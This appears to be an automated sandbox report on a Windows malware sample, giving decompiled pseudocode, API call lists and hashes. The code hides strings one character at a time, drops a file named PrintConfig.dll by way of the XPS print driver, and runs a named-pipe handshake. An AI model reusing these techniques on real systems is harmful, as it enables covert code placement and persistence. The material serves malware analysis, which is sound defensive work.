												_t502 = CreateEventW(0, 1, 0, 0);
												_v592 = 0;
												_v80 = 0;
												_t503 = E004010BB(0, 1, 0x6fb89af0);
												_t504 =  *_t503(0, 0, E0040FA2E, 0, 0, 0);
												_t689 = _t504;
												_t505 = 0x4d;
												_v580 = _t505;
												_t506 = 0x69;
												_t651 = 0x63;
												_v578 = _t506;
												_t507 = 0x72;
												_t675 = 0x6f;
												_v574 = _t507;
												_t508 = 0x73;
												_v570 = _t508;
												_t509 = 0x66;
												_v566 = _t509;
												_t510 = 0x74;
												_v564 = _t510;
												_v572 = _t675;
												_v568 = _t675;
												_t676 = 0x20;
												_t511 = 0x58;
												_v560 = _t511;
												_t512 = 0x50;
												_v558 = _t512;
												_t513 = 0x53;
												_v556 = _t513;
												_t514 = 0x44;
												_v552 = _t514;
												_t515 = 0x6f;
												_v550 = _t515;
												_v576 = _t651;
												_v562 = _t676;
												_v554 = _t676;
												_v548 = _t651;
												_t516 = 0x75;
												_v546 = _t516;
												_t517 = 0x6d;
												_v544 = _t517;
												_t518 = 0x65;
												_t652 = 0x6e;
												_v542 = _t518;
												_v540 = _t652;
												_t653 = 0x74;
												_t519 = 0x57;
												_v534 = _t519;
												_t520 = 0x72;
												_v532 = _t520;
												_v524 = _t520;
												_v522 = 0;
												_v536 = _t676;
												_t677 = 0x69;
												_v530 = _t677;
												_t678 = 0x65;
												_t522 = 0x50;
												_v424 = _t522;
												_t523 = 0x72;
												_v422 = _t523;
												_t524 = 0x69;
												_v420 = _t524;
												_t525 = 0x6e;
												_v418 = _t525;
												_v526 = _t678;
												_t679 = 0x20;
												_t526 = 0x4a;
												_v412 = _t526;
												_t527 = 0x6f;
												_v410 = _t527;
												_t528 = 0x62;
												_v408 = _t528;
												_t529 = 0x31;
												_v404 = _t529;
												_v402 = 0;
												_v538 = _t653;
												_v528 = _t653;
												_v416 = _t653;
												_v414 = _t679;
												_v406 = _t679;
												_v596( &_v580,  &_v424, 0, 0, _t502, 0, 0,  &_v592,  &_v80, 0);
												_t680 = _v80;
												__eflags = _t680;
												if(_t680 != 0) {
													 *((intOrPtr*)( *_t680 + 0x14))(_t680);
												}
												__imp__CoUninitialize();
												WaitForSingleObject(_t689, 0x2710);
												_t399 = 1;
												L48:
												L49:
												return _t399;
											}
											E0040C6D1(_t687);
											E0040C6D1(_t710);
											E0040C6D1( *0x4198f4);
											L47:
											_t399 = 0;
											__eflags = 0;
											goto L48;
										}
										L24:
										_push(_t710);
										goto L9;
									}
									_v276 = _t403;
									_pop(_t548);
									_t681 = 0x6e;
									_t657 = 0x6d;
									_v274 = _t548;
									_t549 = 0x73;
									_v268 = _t549;
									_t550 = 0x30;
									_v266 = _t550;
									_v264 = _t550;
									_t551 = 0x33;
									_v262 = _t551;
									_t552 = 0x69;
									_v258 = _t552;
									_t553 = 0x66;
									_v254 = _t553;
									_t554 = 0x5f;
									_v252 = _t554;
									_t555 = 0x61;
									_v250 = _t555;
									_t556 = 0x64;
									_v246 = _t556;
									_t557 = 0x36;
									_v244 = _t557;
									_t558 = 0x34;
									_v242 = _t558;
									_t559 = 0x2a;
									_v240 = _t559;
									_v68 = _v68 & 0;
									_v272 = _t681;
									_v270 = _t657;
									_v260 = _t701;
									_v256 = _t681;
									_v248 = _t657;
									_v238 = 0;
									_t561 = lstrlenW(_t684);
									_t563 = lstrlenW( &_v276);
									_push( &_v276);
									_t565 =  &_v140;
									_push(_t565);
									_t714 = E0040BEA4( &_v164, lstrlenW(_t565) + _t561 + _t563, 3, _t684);
									_t720 = _t719 + 0x18;
									__eflags = _t714;
									if(_t714 != 0) {
										E0041071A( &_v68);
										 *_t720 = 0x32432452;
										_t572 = E004010BB(_t601);
										_v8 =  *_t572(_t714,  &_v1464, 1);
										E00410A5F( &_v68);
										E0040C6D1(_t714);
										_t577 = _v8;
										__eflags = _t577;
										if(_t577 == 0) {
											goto L16;
										}
										E00407F69(_t577);
										_t664 = 0x5c;
										_t579 = 0x41;
										_v394 = _t579;
										_t580 = 0x6d;
										_t715 = 0x64;
										_v392 = _t580;
										_t581 = 0x36;
										_v388 = _t581;
										_t582 = 0x34;
										_v386 = _t582;
										_t583 = 0x50;
										_v382 = _t583;
										_t584 = 0x72;
										_t682 = 0x69;
										_v380 = _t584;
										_v396 = _t664;
										_v384 = _t664;
										_t665 = 0x6e;
										_t585 = 0x74;
										_v374 = _t585;
										_t586 = 0x43;
										_v372 = _t586;
										_t587 = 0x6f;
										_v370 = _t587;
										_t588 = 0x66;
										_v366 = _t588;
										_t589 = 0x67;
										_v362 = _t589;
										_t590 = 0x2e;
										_v390 = _t715;
										_v358 = _t715;
										_t716 = 0x6c;
										_v360 = _t590;
										_v378 = _t682;
										_v376 = _t665;
										_v368 = _t665;
										_v364 = _t682;
										_v356 = _t716;
										_v354 = _t716;
										_v352 = 0;
										_t592 = lstrlenW(_t684);
										_t594 = lstrlenW( &_v1420);
										_t709 = _t592 + _t594 + lstrlenW( &_v396);
										_t452 =  &_v396;
										goto L22;
									}
									goto L16;
								}
							}
							L9:
							E0040C6D1();
							E0040C6D1( *0x4198f4);
							goto L46;
						}
						L7:
						_push( *0x4198f4);
						goto L45;
					}
					E0040C6D1( *0x4198f4);
					_t399 = 0;
					goto L49;
				}
				L1:
				return 0;
			}

0x0040ec3e
0x0040ec41
0x0040ec48
0x0040ec4b
0x0040ec52
0x0040ec55
0x0040ec5c
0x0040ec5f
0x0040ec66
0x0040ec69
0x0040ec70
0x0040ec73
0x0040ec7a
0x0040ec7d
0x0040ec80
0x0040ec87
0x0040ec8a
0x0040ec91
0x0040ec92
0x0040ec9b
0x0040ec9c
0x0040eca3
0x0040ecac
0x0040ecb9
0x0040ecc0
0x0040ecc8
0x0040ecd3
0x0040ecd6
0x0040ecd9
0x0040ecdc
0x0040ecdf
0x0040ece2
0x0040ece5
0x0040ece8
0x0040eceb
0x0040ecee
0x0040ecf1
0x0040ecf4
0x0040ecf7
0x0040ecfa
0x0040ecfd
0x0040ed00
0x0040ed03
0x0040ed06
0x0040ed09
0x0040ed0a
0x0040ed10
0x0040ed13
0x0040ed16
0x0040ed1d
0x0040ed21
0x0040ed24
0x0040ed28
0x0040ed2b
0x0040ed31
0x0040ed37
0x0040ed39
0x00000000
0x00000000
0x0040ed3b
0x0040ed40
0x0040ed42
0x00000000
0x00000000
0x0040ed4c
0x0040ed57
0x0040ed59
0x0040ed5b
0x0040ed7e
0x0040ed81
0x0040ed83
0x0040ed92
0x0040ed99
0x0040ed9a
0x0040ed9c
0x0040edb4
0x0040edba
0x0040edbe
0x0040edbf
0x0040edc4
0x0040edc9
0x0040edc9
0x0040edcf
0x0040edd2
0x0040edd5
0x0040eddc
0x0040eddf
0x0040ede6
0x0040ede9
0x0040edf0
0x0040edf3
0x0040edf7
0x0040edfa
0x0040edfd
0x0040ee01
0x0040ee04
0x0040ee08
0x0040ee0b
0x0040ee0f
0x0040ee12
0x0040ee16
0x0040ee19
0x0040ee1d
0x0040ee20
0x0040ee24
0x0040ee27
0x0040ee2b
0x0040ee2e
0x0040ee32
0x0040ee36
0x0040ee39
0x0040ee3d
0x0040ee40
0x0040ee44
0x0040ee47
0x0040ee4b
0x0040ee4e
0x0040ee52
0x0040ee56
0x0040ee59
0x0040ee5d
0x0040ee60
0x0040ee64
0x0040ee67
0x0040ee6b
0x0040ee6e
0x0040ee72
0x0040ee75
0x0040ee7c
0x0040ee80
0x0040ee84
0x0040ee88
0x0040ee8e
0x0040ee8f
0x0040ee92
0x0040ee99
0x0040eea0
0x0040eea7
0x0040eeae
0x0040eeb5
0x0040eebc
0x0040eec3
0x0040eeca
0x0040eed6
0x0040eedc
0x0040eeea
0x0040eef1
0x0040eef8
0x0040eeff
0x0040ef06
0x0040ef0d
0x0040ef14
0x0040ef1b
0x0040ef22
0x0040ef29
0x0040ef30
0x0040ef37
0x0040ef3e
0x0040ef47
0x0040ef4a
0x0040ef4d
0x0040ef50
0x0040ef53
0x0040ef56
0x0040ef59
0x0040ef5c
0x0040ef5f
0x0040ef62
0x0040ef65
0x0040ef68
0x0040ef6b
0x0040ef6e
0x0040ef71
0x0040ef74
0x0040ef77
0x0040ef7e
0x0040ef7f
0x0040ef86
0x0040ef91
0x0040ef97
0x0040ef98
0x0040efa5
0x0040efa8
0x0040efac
0x0040efb0
0x0040efb4
0x0040efb7
0x0040efbb
0x0040efc2
0x0040efc9
0x0040efd0
0x0040efd7
0x0040efde
0x0040efe5
0x0040efeb
0x0040efed
0x0040f99b
0x0040f99b
0x0040f99c
0x0040f99c
0x0040f9a1
0x00000000
0x0040eff3
0x0040eff8
0x0040f005
0x0040f007
0x0040f00e
0x00000000
0x00000000
0x0040f014
0x0040f01b
0x0040f01d
0x0040f01e
0x0040f020
0x0040f260
0x0040f267
0x0040f26a
0x0040f26d
0x0040f274
0x0040f277
0x0040f27e
0x0040f281
0x0040f288
0x0040f28b
0x0040f292
0x0040f299
0x0040f29c
0x0040f2a3
0x0040f2a6
0x0040f2ad
0x0040f2b0
0x0040f2b7
0x0040f2ba
0x0040f2c1
0x0040f2c4
0x0040f2cb
0x0040f2ce
0x0040f2d5
0x0040f2d8
0x0040f2df
0x0040f2e0
0x0040f2ea
0x0040f2f1
0x0040f2f8
0x0040f2ff
0x0040f305
0x0040f310
0x0040f31a
0x0040f31b
0x0040f321
0x0040f337
0x0040f339
0x0040f33c
0x0040f33e
0x0040f11a
0x0040f11a
0x00000000
0x0040f11a
0x0040f34b
0x0040f35d
0x0040f360
0x0040f365
0x0040f369
0x0040f36b
0x00000000
0x00000000
0x0040f372
0x0040f37a
0x0040f37d
0x0040f380
0x0040f387
0x0040f38a
0x0040f391
0x0040f394
0x0040f39b
0x0040f39e
0x0040f3a5
0x0040f3a8
0x0040f3af
0x0040f3b2
0x0040f3b5
0x0040f3bc
0x0040f3c3
0x0040f3ca
0x0040f3cd
0x0040f3d0
0x0040f3d7
0x0040f3da
0x0040f3e1
0x0040f3e4
0x0040f3eb
0x0040f3ee
0x0040f3f5
0x0040f3f8
0x0040f3ff
0x0040f402
0x0040f409
0x0040f40c
0x0040f40d
0x0040f417
0x0040f41e
0x0040f425
0x0040f42c
0x0040f433
0x0040f43a
0x0040f441
0x0040f447
0x0040f452
0x0040f45d
0x0040f45f
0x0040f45f
0x0040f461
0x0040f467
0x0040f467
0x0040f46e
0x0040f46f
0x0040f475
0x0040f48e
0x0040f491
0x0040f497
0x0040f499
0x00000000
0x00000000
0x0040f4a1
0x0040f4a4
0x0040f4a7
0x0040f4aa
0x0040f4b1
0x0040f4b4
0x0040f4bb
0x0040f4be
0x0040f4c5
0x0040f4c8
0x0040f4cf
0x0040f4d2
0x0040f4d9
0x0040f4e0
0x0040f4e3
0x0040f4e6
0x0040f4e9
0x0040f4f0
0x0040f4f7
0x0040f4fe
0x0040f505
0x0040f508
0x0040f50b
0x0040f512
0x0040f515
0x0040f51c
0x0040f51f
0x0040f526
0x0040f529
0x0040f530
0x0040f533
0x0040f53a
0x0040f53d
0x0040f544
0x0040f547
0x0040f54e
0x0040f551
0x0040f558
0x0040f559
0x0040f564
0x0040f571
0x0040f578
0x0040f57f
0x0040f586
0x0040f58d
0x0040f594
0x0040f59b
0x0040f5a2
0x0040f5a9
0x0040f5b0
0x0040f5bd
0x0040f5bf
0x0040f5c1
0x0040f5d6
0x0040f5d9
0x0040f5db
0x00000000
0x00000000
0x0040f5e6
0x0040f5ec
0x0040f5ee
0x0040f60f
0x0040f618
0x0040f61a
0x0040f620
0x0040f625
0x0040f628
0x0040f62e
0x0040f636
0x0040f63b
0x0040f63d
0x0040f643
0x0040f648
0x0040f649
0x0040f64e
0x0040f653
0x0040f655
0x0040f663
0x0040f668
0x0040f657
0x0040f657
0x0040f65c
0x0040f65c
0x0040f66d
0x0040f66d
0x0040f66f
0x0040f66f
0x0040f673
0x0040f674
0x0040f674
0x0040f67a
0x0040f67d
0x0040f67f
0x0040f686
0x0040f68a
0x0040f68e
0x0040f692
0x0040f696
0x0040f69a
0x0040f69e
0x0040f6a2
0x0040f6a6
0x0040f6aa
0x0040f6b6
0x0040f6ba
0x0040f6c1
0x0040f6c7
0x0040f6cb
0x0040f6cf
0x0040f6d3
0x0040f6d7
0x0040f6db
0x0040f6df
0x0040f6e3
0x0040f6e7
0x0040f6eb
0x0040f6f7
0x0040f6ff
0x0040f701
0x0040f707
0x0040f70a
0x0040f71a
0x0040f728
0x0040f72f
0x0040f735
0x0040f739
0x00000000
0x00000000
0x0040f740
0x0040f749
0x0040f74a
0x0040f74c
0x0040f74f
0x0040f752
0x0040f753
0x00000000
0x00000000
0x00000000
0x0040f753
0x0040f756
0x0040f75b
0x0040f75f
0x0040f762
0x00000000
0x00000000
0x0040f769
0x0040f772
0x0040f77e
0x0040f792
0x0040f79d
0x0040f7ac
0x0040f7b2
0x0040f7b5
0x0040f7c6
0x0040f7ca
0x0040f7cc
0x0040f7cf
0x0040f7d6
0x0040f7d9
0x0040f7dc
0x0040f7e3
0x0040f7e6
0x0040f7e9
0x0040f7f0
0x0040f7f3
0x0040f7fa
0x0040f7fd
0x0040f804
0x0040f807
0x0040f80e
0x0040f815
0x0040f81c
0x0040f81f
0x0040f822
0x0040f829
0x0040f82c
0x0040f833
0x0040f836
0x0040f83d
0x0040f840
0x0040f847
0x0040f84a
0x0040f851
0x0040f858
0x0040f85f
0x0040f866
0x0040f86d
0x0040f870
0x0040f877
0x0040f87a
0x0040f881
0x0040f884
0x0040f887
0x0040f88e
0x0040f895
0x0040f898
0x0040f89b
0x0040f8a2
0x0040f8a5
0x0040f8ac
0x0040f8b5
0x0040f8bb
0x0040f8c2
0x0040f8c5
0x0040f8cc
0x0040f8cf
0x0040f8d2
0x0040f8d9
0x0040f8dc
0x0040f8e3
0x0040f8e6
0x0040f8ed
0x0040f8f0
0x0040f8f7
0x0040f8fe
0x0040f901
0x0040f904
0x0040f90b
0x0040f90e
0x0040f915
0x0040f918
0x0040f91f
0x0040f920
0x0040f92a
0x0040f93a
0x0040f94d
0x0040f95b
0x0040f963
0x0040f96a
0x0040f971
0x0040f977
0x0040f97a
0x0040f97c
0x0040f981
0x0040f981
0x0040f984
0x0040f990
0x0040f998
0x0040f9a4
0x0040f9a5
0x00000000
0x0040f9a5
0x0040f5f1
0x0040f5f7
0x0040f602
0x0040f9a2
0x0040f9a2
0x0040f9a2
0x00000000
0x0040f9a2
0x0040f5c3
0x0040f5c3
0x00000000
0x0040f5c3
0x0040f026
0x0040f02d
0x0040f030
0x0040f033
0x0040f036
0x0040f03d
0x0040f040
0x0040f047
0x0040f04a
0x0040f051
0x0040f058
0x0040f05b
0x0040f062
0x0040f065
0x0040f06c
0x0040f06f
0x0040f076
0x0040f079
0x0040f080
0x0040f083
0x0040f08a
0x0040f08d
0x0040f094
0x0040f097
0x0040f09e
0x0040f0a1
0x0040f0a8
0x0040f0a9
0x0040f0b2
0x0040f0b6
0x0040f0bd
0x0040f0c4
0x0040f0cb
0x0040f0d2
0x0040f0d9
0x0040f0df
0x0040f0ea
0x0040f0f4
0x0040f0f5
0x0040f0fb
0x0040f111
0x0040f113
0x0040f116
0x0040f118
0x0040f124
0x0040f129
0x0040f132
0x0040f143
0x0040f14a
0x0040f150
0x0040f155
0x0040f15a
0x0040f15c
0x00000000
0x00000000
0x0040f15f
0x0040f167
0x0040f16a
0x0040f16d
0x0040f174
0x0040f177
0x0040f17a
0x0040f181
0x0040f184
0x0040f18b
0x0040f18e
0x0040f195
0x0040f198
0x0040f19f
0x0040f1a2
0x0040f1a5
0x0040f1ac
0x0040f1b3
0x0040f1ba
0x0040f1bd
0x0040f1c0
0x0040f1c7
0x0040f1ca
0x0040f1d1
0x0040f1d4
0x0040f1db
0x0040f1de
0x0040f1e5
0x0040f1e8
0x0040f1ef
0x0040f1f2
0x0040f1f9
0x0040f200
0x0040f201
0x0040f20b
0x0040f212
0x0040f219
0x0040f220
0x0040f227
0x0040f22e
0x0040f235
0x0040f23b
0x0040f246
0x0040f253
0x0040f255
0x00000000
0x0040f255
0x00000000
0x0040f118
0x0040efed
0x0040ed9e
0x0040ed9e
0x0040eda9
0x00000000
0x0040edae
0x0040ed85
0x0040ed85
0x00000000
0x0040ed85
0x0040ed63
0x0040ed69
0x00000000
0x0040ed69
0x0040ecca
0x00000000

APIs

LoadLibraryW.KERNEL32(?), ref: 0040ECC0
GetProcAddress.KERNEL32(00000000,?), ref: 0040ED2B

Part of subcall function 0040EB60: lstrlenW.KERNEL32(?,?,?,?,?,?,0040ED40), ref: 0040EBD6
Part of subcall function 0040EB60: lstrlenW.KERNEL32(?,?,?,?,?,?,0040ED40), ref: 0040EBF8
Part of subcall function 0040EB60: lstrlenW.KERNEL32(?,?,?,?,?,?,0040ED40), ref: 0040EC17

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

lstrlenW.KERNEL32(00000000,2CA1B5F0), ref: 0040EDBA
lstrlenW.KERNEL32(00000000), ref: 0040EDC7
GetModuleHandleW.KERNEL32(?), ref: 0040EFE5
GetProcAddress.KERNEL32(00000000,?), ref: 0040EFF8

Part of subcall function 00410679: GetModuleHandleW.KERNEL32(?,?), ref: 004106E4
Part of subcall function 00410679: GetProcAddress.KERNEL32(00000000), ref: 004106EB
Part of subcall function 00410679: GetCurrentProcess.KERNEL32(00000000), ref: 00410702

lstrlenW.KERNEL32(00000000), ref: 0040F0DF
lstrlenW.KERNEL32(?), ref: 0040F0EA
lstrlenW.KERNEL32(?,00000003,00000000,?,?), ref: 0040F100
lstrlenW.KERNEL32(00000000), ref: 0040F23B
lstrlenW.KERNEL32(?), ref: 0040F246
lstrlenW.KERNEL32(?), ref: 0040F251
lstrlenW.KERNEL32(00000000), ref: 0040F305
lstrlenW.KERNEL32(?), ref: 0040F310
lstrlenW.KERNEL32(?,00000003,00000000,?,?), ref: 0040F326

Part of subcall function 0040BEA4: lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,0040F337,?,00000000), ref: 0040BEAE
Part of subcall function 0040BEA4: GetModuleHandleW.KERNEL32(?,7757BFA8,?,?,?,?,?,?,0040F337,?,00000000), ref: 0040BF0C
Part of subcall function 0040BEA4: GetProcAddress.KERNEL32(00000000,_vswprintf), ref: 0040BF3E
Part of subcall function 0040BEA4: GetProcAddress.KERNEL32(00000000,?), ref: 0040BF52

Part of subcall function 00407F69: FindClose.KERNELBASE(00408CBA,?,00408CBA,00000000), ref: 00407F7D

lstrlenW.KERNEL32(00000000), ref: 0040F447
lstrlenW.KERNEL32(?), ref: 0040F452
lstrlenW.KERNEL32(?), ref: 0040F45D
lstrlenW.KERNEL32(?,00000004,00000000,?,?,?), ref: 0040F47A
ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 0040F5B7
ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 0040F5E6

Part of subcall function 0041071A: GetModuleHandleW.KERNEL32(?,Wow64Disab), ref: 004107AD
Part of subcall function 0041071A: GetProcAddress.KERNEL32(00000000), ref: 004107B4

Part of subcall function 00410A5F: GetModuleHandleW.KERNEL32(?,Wow64R), ref: 00410AFA
Part of subcall function 00410A5F: GetProcAddress.KERNEL32(00000000), ref: 00410B01

Part of subcall function 004100EF: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041010B
Part of subcall function 004100EF: VirtualAlloc.KERNEL32(00000000,0000000E,00003000,00000004,?,?,?,0040F62D,00000000,00000000), ref: 00410128
Part of subcall function 004100EF: CloseHandle.KERNEL32(0040F62D), ref: 00410190
Part of subcall function 004100EF: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004101B0
Part of subcall function 004100EF: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004101BA
Part of subcall function 004100EF: VirtualFree.KERNEL32(?,00000000,00008000), ref: 004101CB

Part of subcall function 0040F9F0: lstrlenW.KERNEL32(?,00417E18,00001A00,?,00000014), ref: 0040FA0E

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F71A
WriteFile.KERNEL32(00000000,00417E18,00001A00,?,00000000), ref: 0040F72F
Sleep.KERNEL32(000003E8), ref: 0040F740
CloseHandle.KERNEL32(000000FF), ref: 0040F769
CoInitialize.OLE32(00000000), ref: 0040F772
CoCreateInstance.OLE32(004119CC,00000000,00000001,004119DC,?), ref: 0040F792
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040F79D
CoUninitialize.OLE32 ref: 0040F984
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0040F990

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

P, xrefs: 0040ED24
V, xrefs: 0040EFAC
X, xrefs: 0040ED1D
G, xrefs: 0040EFA8
r, xrefs: 0040EFB0

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen$AddressHandleProc$Virtual$Module$Free$CloseCreate$AllocEnvironmentExpandFileLibraryLoadStrings$CurrentEventFindInitializeInstanceObjectProcessSingleSleepUninitializeWaitWrite
String ID: G$P$V$X$r
API String ID: 4287120645-727790823
Opcode ID: 998259fcf1ed7918d17ebec42f97b091356886b7539d0d6fa9accf5924f9a099
Instruction ID: 8380c309e828e0c1cd96e9e8e38a6f5229017549fcf7ab27dc2801a033bef686
Opcode Fuzzy Hash: 998259fcf1ed7918d17ebec42f97b091356886b7539d0d6fa9accf5924f9a099
Instruction Fuzzy Hash: 32828431954358A9EB20CBA0DC46BEEB374EF54710F1054EBE50CEB2E1E6B50EC48B5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040FA2E, Relevance: 18.1, APIs: 12, Instructions: 128
filepipestringUNIQUE

Download Yara Rule

C-Code - Quality: 91%

			E0040FA2E() {
				long _v8;
				long _v12;
				void _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				void _v28;
				void* __ebx;
				signed int _t21;
				signed int _t22;
				long _t47;
				signed int _t52;
				long _t61;
				void* _t64;
				void* _t65;

				_t21 = CreateNamedPipeW( *0x4198f4, 3, 6, 0xff, 0x200, 0x200, 0, 0);
				_t65 = _t21;
				_t22 = _t21 | 0xffffffff;
				if(_t65 != _t22) {
					if(ConnectNamedPipe(_t65, 0) != 0) {
						L3:
						_t61 = 0xc;
						_t52 = 0;
						_v8 = 0;
						_v20 = 0;
						_v28 = 0;
						_v24 = 0;
						while(ReadFile(_t65,  &_v28 + _t52 * 0xc, _t61,  &_v8, 0) != 0 || GetLastError() == 0xea) {
							_t52 = _t52 + _v8;
							_push(0);
							_pop(0);
							_t61 = _t61 - _v8;
							if(_t61 != 0) {
								continue;
							}
							break;
						}
						if(_v28 != 0xaaaaa999 || _v24 != 0xdeadfeed) {
							L14:
							CloseHandle(_t65);
							return 0;
						} else {
							_v12 = 0;
							_v20 =  *((intOrPtr*)(E004010BB(_t52, 1, 0x6b416786)))();
							if(WriteFile(_t65,  &_v28, 0xc,  &_v12, 0) == 0) {
								goto L14;
							}
							_t64 = E0040C2ED(WriteFile, 0);
							if(_t64 == 0) {
								goto L14;
							}
							_v16 = lstrlenW(_t64) + _t37;
							if(WriteFile(_t65,  &_v16, 4,  &_v12, 0) == 0 || WriteFile(_t65, _t64, _v16,  &_v12, 0) == 0) {
								goto L14;
							} else {
								L13:
								CloseHandle(_t65);
								E0040C6D1( *0x4198f4);
								ExitThread(0);
							}
						}
					}
					_t47 = GetLastError();
					asm("sbb eax, eax");
					if( ~(_t47 - 0x217) + 1 == 0) {
						goto L13;
					}
					goto L3;
				}
				return _t22;
			}

0x0040fa4f
0x0040fa55
0x0040fa57
0x0040fa5c
0x0040fa6f
0x0040fa89
0x0040fa8d
0x0040fa8e
0x0040fa90
0x0040fa93
0x0040fa96
0x0040fa99
0x0040fa9c
0x0040fac3
0x0040fac6
0x0040fac8
0x0040fac9
0x0040facc
0x00000000
0x00000000
0x00000000
0x0040facc
0x0040fad5
0x0040fb70
0x0040fb71
0x00000000
0x0040fae8
0x0040faf1
0x0040fb04
0x0040fb16
0x00000000
0x00000000
0x0040fb1e
0x0040fb23
0x00000000
0x00000000
0x0040fb30
0x0040fb42
0x00000000
0x0040fb55
0x0040fb55
0x0040fb56
0x0040fb62
0x0040fb6a
0x0040fb6a
0x0040fb42
0x0040fad5
0x0040fa71
0x0040fa7e
0x0040fa83
0x00000000
0x00000000
0x00000000
0x0040fa83
0x0040fb7f

APIs

CreateNamedPipeW.KERNEL32(00000003,00000006,000000FF,00000200,00000200,00000000,00000000), ref: 0040FA4F
ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 0040FA67
GetLastError.KERNEL32 ref: 0040FA71
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 0040FAAC
GetLastError.KERNEL32 ref: 0040FAB6
CloseHandle.KERNEL32(00000000), ref: 0040FB71

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

WriteFile.KERNEL32(00000000,AAAAA999,0000000C,?,00000000), ref: 0040FB12

Part of subcall function 0040C2ED: GetModuleFileNameW.KERNEL32(?,00000000,00000100), ref: 0040C329
Part of subcall function 0040C2ED: GetLastError.KERNEL32 ref: 0040C32F

lstrlenW.KERNEL32(00000000), ref: 0040FB26
WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0040FB3E
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040FB4F
CloseHandle.KERNEL32(00000000), ref: 0040FB56

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

ExitThread.KERNEL32 ref: 0040FB6A

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: File$ErrorLastWrite$CloseHandleNamedPipe$ConnectCreateExitFreeLibraryLoadModuleNameReadThreadVirtuallstrlen
String ID:
API String ID: 3569198385-0
Opcode ID: 7dad100be74e4d65f011cdbce6e27c8047ae7640cceb4cffc1c3fff997508fd6
Instruction ID: 8cea77305412f0a5c5f72d04196d9c877691f0e9b21a9881a83e51ac635e8979
Opcode Fuzzy Hash: 7dad100be74e4d65f011cdbce6e27c8047ae7640cceb4cffc1c3fff997508fd6
Instruction Fuzzy Hash: BB416132A40205AEE7209BB4DC95FFF7BBCEB45710F104137F600E15D0E7749A458AA9

Uniqueness

Uniqueness Score: 100.00%

Function 0042FB59, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184UNIQUE

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

Part of subcall function 0042F576: EnumSystemLocalesW.KERNEL32(0042F856,00000001,?,?,AB,?,0042FBFD,AB,00000055,?,?,?,?,004241EB,?,?), ref: 0042F5C0

Part of subcall function 0042F4DB: EnumSystemLocalesW.KERNEL32(0042F601,00000001,00000000,?,AB,?,0042FC39,00000000,00000055,?,?), ref: 0042F54D

GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0042FD26

Part of subcall function 0042F490: EnumSystemLocalesW.KERNEL32(0042F3E7,00000001,?,?,?,0042FC5B,AB,00000055,?,?,?,?,004241EB,?,?,?), ref: 0042F4C7

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 0042FC65

Part of subcall function 0042F97E: GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA17
Part of subcall function 0042F97E: GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0042FCA4,?,00000000), ref: 0042FA40
Part of subcall function 0042F97E: GetACP.KERNEL32(?,?,0042FCA4,?,00000000), ref: 0042FA55

IsValidCodePage.KERNEL32(00000000), ref: 0042FCB0
IsValidLocale.KERNEL32(?,00000001), ref: 0042FCBF
GetLocaleInfoW.KERNEL32(?,00001001,AB,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0042FD07

Strings

AB, xrefs: 0042FB82, 0042FB92, 0042FC52, 0042FBF4, 0042FBE9, 0042FBEC, 0042FBF7, 0042FC55
AB, xrefs: 0042FC3B, 0042FC30, 0042FC8E
AB, xrefs: 0042FB6F, 0042FCFE

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Locale$Info$EnumLocalesSystem$ErrorLastValid_free$CodeDefaultPageUser
String ID: AB$AB$AB
API String ID: 4293152190-173218880
